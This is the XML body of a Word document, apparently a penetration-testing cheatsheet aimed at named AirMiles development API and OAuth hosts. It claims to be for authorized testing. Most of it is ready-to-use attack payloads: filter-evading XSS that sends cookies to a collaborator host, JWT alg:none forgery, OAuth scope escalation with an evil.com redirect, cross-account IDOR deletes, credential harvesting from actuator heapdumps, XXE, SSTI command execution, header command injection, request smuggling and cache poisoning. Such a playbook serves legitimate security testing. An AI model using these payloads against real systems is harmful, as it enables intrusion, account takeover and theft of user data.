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ASF-78 AirMiles Pentest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Manual Testing Cheatsheet &amp; Payload Reference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Target: dev.airmilesapis.ca | oauth-dev.airmiles.ca | March 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Priority Order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Constraint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No active scanning. All testing must be manual, one request at a time. Payloads use WAF bypass / obfuscation techniques.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200"/>
        <w:gridCol w:w="50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BOLA / IDOR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 collector number in path with valid token. One request per test.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JWT Manipulation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Decode JWT, test alg:none, modify claims (scope, sub, collector).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OAuth Scope Escalation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 token with elevated/wildcard scope values.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Spring Boot Actuator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Probe /actuator/env, /mappings, /heapdump for secrets.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Stored XSS (WAF Bypass)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Escalate confirmed XSS via savedResponses with advanced payloads.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Mass Assignment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unexpected fields in POST/PUT survey bodies.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Request Smuggling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CL.TE / TE.CL / H2.CL probes on nginx+Spring chain.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SQLi / NoSQL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Encoded payloads in collector number, surveyId params.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SSTI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Template expressions in savedResponses field.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Cache Poisoning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Host header variants against Cloudflare/nginx layers.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XSS WAF Bypass Payloads (via savedResponses)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Context: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">alert() is blocked by WAF. prompt() works. Inject into savedResponses array values and tags field.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Event Handler + Encoding Tricks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"&gt;&lt;img src=x onerror=eval(atob('YWxlcnQoMSk='))&gt;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"&gt;&lt;svg onload=self['al'+'ert'](document.domain)&gt;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"&gt;&lt;svg onload=top[/al/.source+/ert/.source](1)&gt;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"&gt;&lt;img src=x onerror=window['al\x65rt'](1)&gt;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"&gt;&lt;details open ontoggle=print()&gt;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"&gt;&lt;marquee onstart=confirm(1)&gt;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"&gt;&lt;body onpageshow=confirm(1)&gt;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"&gt;&lt;input onfocus=confirm(1) autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Constructor / Template Literal Abuse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"&gt;&lt;svg onload=Function`a\x60return+this\x60``.constructor('alert(1)')()&gt;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"&gt;&lt;img src onerror="[].constructor.constructor('return this')().alert(1)"&gt;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"&gt;&lt;svg/onload=self[`\x61lert`](document.cookie)&gt;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"&gt;&lt;svg onload=Reflect.apply(alert,null,[1])&gt;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"&gt;&lt;svg onload=window.onerror=alert;throw+1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DOM Clobbering / Frame Injection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"&gt;&lt;iframe srcdoc="&lt;script&gt;parent.postMessage(document.cookie,'*')&lt;/script&gt;"&gt;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"&gt;&lt;object data="javascript:void(document['loca'+'tion']='https://COLLABORATOR')"&gt;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"&gt;&lt;a href="javascript:void(0)" autofocus onfocus=\u0061lert(1)&gt;click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"&gt;&lt;embed src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Polyglot Payload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jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=self[atob('YWxlcnQ=')] )//%0teleEl%253teleert`1teleEl`//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Bypass Variants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"&gt;&lt;img src=x onerror=&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;(1)&gt;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"&gt;&lt;svg onload=\u0061\u006C\u0065\u0072\u0074(1)&gt;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%22%3E%3Csvg%20onload%3Dconfirm%601%60%3E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"&gt;&lt;svg onload=top[8680439..toString(30)](1)&gt;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OAuth / Authentication Testing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Target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oauth-dev.airmiles.ca (ROPC grant, Cloudflare WAF, HTTP/2)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Scope Manipulation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/oauth/token HTTP/2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Host: oauth-dev.airmiles.ca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application/x-www-form-urlencoded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Test each scope value individually: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scope=admin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scope=*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scope=collectorPreference:write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scope=collectorPreference:read collectorPreference:write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scope=memberbanner collectorPreference:read collectorPreference:write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Remove scope parameter entirely to check default</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Grant Type Switching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Try client_credentials (no user context)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grant_type=client_credentials&amp;client_id=&lt;CLIENT_ID&gt;&amp;client_secret=&lt;CLIENT_SECRET&gt;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Try authorization_code (if code flow exists)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grant_type=authorization_code&amp;code=test&amp;redirect_uri=https://evil.com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Try refresh_token if one was returned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grant_type=refresh_token&amp;refresh_token=&lt;TOKEN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Manipulation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1. Decode the JWT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echo "eyJhbGci..." | cut -d. -f2 | base64 -d 2&gt;/dev/null | python3 -m json.tool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2. Test alg:none bypass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Change header to {"alg":"none","typ":"JWT"}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base64url encode: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0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Modify claims, strip signature, send with trailing dot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3. Test alg switching (RS256 -&gt; HS256)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Sign with the public key as HMAC secret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4. Modify claims to test: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  - Change sub/collector number to another user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  - Elevate scope/role claims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  - Set exp far in the future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  - Add admin:true or similar claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Token Expiry / Reuse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Use token after logout (token invalidation check)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Use token after 86400s expiry (clock skew check)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Use token from one environment in another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Send token in different locations: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Authorization: Bearer &lt;token&gt;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Cookie: access_token=&lt;token&gt;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?access_token=&lt;token&gt;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BOLA / IDOR Testing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Confirmed collector: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">81703920854. Test with your valid Bearer token against different collector numbers.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Direct Object Reference Tests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Increment/decrement collector number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/collectors/81703920855/surveys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/collectors/81703920853/surveys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/collectors/00000000001/surveys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/collectors/99999999999/surveys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Cross-account write operations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/collectors/81703920855/surveys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PUT /collectors/81703920855/surveys/&lt;surveyId&gt;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DELETE /collectors/81703920855/surveys/&lt;surveyId&gt;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Try collector number in body vs path mismatch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/collectors/81703920854/surveys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{"collectorNumber":"81703920855", ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Survey ID Enumeration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Try accessing other survey IDs with your token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/collectors/81703920854/surveys/&lt;OTHER_SURVEY_ID&gt;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UUID prediction (if sequential or time-based)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Create two surveys, compare UUIDs for patterns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surveyId format: 187673d4-93c9-4cda-898c-7b10a9cc4632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Spring Boot Actuator Enumeration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Confirmed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Health endpoint returns Spring Boot actuator content-type. Backend is Spring Boot behind nginx/AWS.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Standard Actuator Endpoints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/collectors/surveys/actuator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/collectors/surveys/actuator/env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/collectors/surveys/actuator/configprops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/collectors/surveys/actuator/mappings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/collectors/surveys/actuator/beans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/collectors/surveys/actuator/heapdump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/collectors/surveys/actuator/threaddump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/collectors/surveys/actuator/loggers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/collectors/surveys/actuator/metrics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/collectors/surveys/actuator/scheduledtasks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/collectors/surveys/actuator/httptrace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/collectors/surveys/info HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal Bypass (Nginx Normalization)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/collectors/surveys/health/..;/env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/collectors/surveys/health;/..;/env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/collectors/surveys;/actuator/env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/%63ollectors/surveys/actuator/env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/collectors/surveys/actuator/env;.json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/collectors/surveys/actuator/env.json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/collectors/surveys/ACTUATOR/ENV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/collectors/surveys/health/../env HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">If /actuator/env returns data, check for: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Database credentials (spring.datasource.*)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API keys / secrets (*.api-key, *.secret)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Internal service URLs (*.url, *.endpoint)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AWS credentials (aws.accessKeyId, aws.secretKey)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If /actuator/heapdump returns a file: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Download and search with: strings heapdump | grep -i password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Use Eclipse MAT for full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Mass Assignment / Parameter Pollution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Unexpected Fields in POST/PUT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/collectors/81703920854/surveys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"isSurveySkipped": false,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"surveyData": [...],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"tags": ["Q1-1-instore"],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"source": "CARE",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"collectorNumber": "81703920855",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"role": "admin",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"isAdmin": true,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"userId": "admin",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"surveyStatus": "COMPLETE",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"permissions": ["read","write","delete"],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"debug": true,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"internal": true,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"__proto__": {"isAdmin": true}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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type Confusion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Send JSON body with different Content-Type headers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application/xml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Content-Type: text/plain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application/x-www-form-urlencoded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XML payload for same endpoint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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;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&lt;survey&gt;&lt;questionId&gt;&amp;xxe;&lt;/questionId&gt;&lt;/survey&gt;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HTTP Request Smuggling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Chain: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare (HTTP/2) -&gt; nginx -&gt; Spring Boot. Test desync between layers.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CL.TE (nginx uses CL, Spring uses TE)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/collectors/81703920854/surveys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Host: dev.airmilesapis.ca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Content-Length: 6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Transfer-Encoding: chunked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0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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TE.CL (nginx uses TE, Spring uses CL)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/collectors/81703920854/surveys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Host: dev.airmilesapis.ca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Transfer-Encoding: chunked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Content-Length: 3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0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Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TE.TE Obfuscation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Transfer-Encoding: chunked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Transfer-encoding: cow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Transfer-Encoding: chunked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Transfer-Encoding: x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Transfer-Encoding: chunked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Transfer-Encoding : chunked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Transfer-Encoding: xchunked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Transfer-Encoding: chunked\r\nX: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Transfer-Encoding:[tab]chunked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">H2.CL Smuggling (HTTP/2 front, HTTP/1.1 back)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In Burp Repeater with HTTP/2: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Set :method = POST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Set :path = /collectors/81703920854/surveys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Add content-length header that disagrees with body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Add body: 0\r\n\r\nGET /admin HTTP/1.1\r\nHost: dev.airmilesapis.ca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Detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for timeouts, connection resets, 405 from unexpected routes, different backend responding, or getting another user's response.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SQL / NoSQL / SSTI / Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi (WAF Bypass Encoded)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In collector number path parameter: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/collectors/81703920854' OR '1'='1/surveys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/collectors/81703920854%27%20OR%20%271%27%3D%271/surveys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/collectors/81703920854%27%2bOR%2b%271%27%3D%271/surveys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In surveyId query parameter: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?surveyId=1' UNION SELECT NULL--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?surveyId=1%27%20UNION%20SELECT%20NULL--%20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?surveyId=1' AND SLEEP(5)--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?surveyId=1%27%20AND%20SLEEP%285%29--%20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Double URL encoding bypass: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?surveyId=1%2527%2520UNION%2520SELECT%2520NULL--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In savedResponses JSON value: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"savedResponses": ["1' OR '1'='1"]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"savedResponses": ["1; SELECT * FROM users--"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection (if MongoDB)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JSON body injection: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{"questionId": {"$gt": ""}, "savedResponses": {"$ne": null}}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{"questionId": {"$regex": ".*"}}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{"questionId": {"$where": "sleep(5000)"}}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Query parameter injection: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?questionId[$regex]=.*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?questionId[$gt]=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?questionId[$ne]=invalid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI (Server-Side Template Injection)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In savedResponses values - check if 49 appears in GET response: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"savedResponses": ["${7*7}"]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"savedResponses": ["#{7*7}"]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"savedResponses": ["{{7*7}}"]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"savedResponses": ["*{7*7}"]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"savedResponses": ["&lt;%=7*7%&gt;"]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Java/Spring specific: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"savedResponses": ["${T(java.lang.Runtime).getRuntime().exec('id')}"]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"savedResponses": ["#{T(java.lang.Runtime).getRuntime().exec('id')}"]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Freemarker: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"savedResponses": ["&lt;#assign ex=\"freemarker.template.utility.Execute\"?new()&gt;${ex(\"id\")}"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection via Headers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X-Request-ID: $(sleep 5)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X-Request-ID: `sleep 5`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X-Request-ID: ;sleep 5;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X-Request-ID: |sleep 5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Cookie: TSS=;$(sleep 5)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X-Forwarded-For: $(sleep 5)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Web Cache Poisoning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Layers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare (oauth endpoint) + nginx/AWS (API). Check X-Cache, CF-Cache-Status, Age headers.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Host Header Poisoning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/collectors/surveys/health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Host: dev.airmilesapis.ca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X-Forwarded-Host: evil.com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/collectors/surveys/health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Host: dev.airmilesapis.ca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X-Host: evil.com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/collectors/surveys/health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Host: dev.airmilesapis.ca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X-Original-URL: /admin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/collectors/surveys/health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Host: dev.airmilesapis.ca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X-Rewrite-URL: /admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cache Key Manipulation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/collectors/surveys/health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X-Forwarded-Scheme: nothttps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/collectors/surveys/health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X-Forwarded-Proto: http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Cache deception - try appending static extensions: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/collectors/81703920854/surveys/nonexistent.css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/collectors/81703920854/surveys/..%2f..%2f/static/cached.js HTTP/1.1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Rate Limit Bypass Headers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 these headers to rotate identity for enumeration if rate limited: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X-Forwarded-For: 127.0.0.1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X-Forwarded-For: &lt;random IP&gt;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X-Originating-IP: 127.0.0.1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X-Remote-IP: 127.0.0.1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X-Remote-Addr: 127.0.0.1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X-Client-IP: 127.0.0.1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X-Real-IP: 127.0.0.1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True-Client-IP: 127.0.0.1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CF-Connecting-IP: 127.0.0.1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Rotate X-Request-ID on every request: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X-Request-ID: &lt;random UUID&gt;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Try HTTP method override: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X-HTTP-Method-Override: GET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X-Method-Override: GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10. Additional Checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CORS Misconfiguration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/collectors/81703920854/surveys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Origin: https://evil.com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Check if Access-Control-Allow-Origin reflects evil.com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Check if Access-Control-Allow-Credentials: true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Origin: null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Origin: https://dev.airmilesapis.ca.evil.com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Origin: https://devXairmilesapis.ca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Method Tampering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Try unexpected methods on survey endpoints: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PATCH /collectors/81703920854/surveys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OPTIONS /collectors/81703920854/surveys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TRACE /collectors/81703920854/surveys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HEAD /collectors/81703920854/surveys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Method override headers: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/collectors/81703920854/surveys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X-HTTP-Method-Override: DELETE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal / Access Control Bypass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/collectors/../admin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/collectors/81703920854/surveys/../../admin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/collectors/81703920854/surveys%00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/collectors/81703920854/surveys/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/collectors/81703920854/surveys.json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/collectors/81703920854/surveys;.js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/api/v2/collectors/81703920854/surveys HTTP/1.1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/internal/collectors/81703920854/surveys HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie Injection / Session Testing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The TSS cookie is set by the API - test manipulation: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Cookie: TSS5b444f67027=&lt;modified_value&gt;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Session fixation - set TSS before auth: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Cookie: TSS5b444f67027=attacker_controlled_value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# Cookie injection via CRLF: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GET /collectors/surveys/health%0d%0aSet-Cookie:%20evil=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p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Document generated for ASF-78 authorized penetration testing only.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2026-03-16T18:01:20.057Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-16T18:01:20.058Z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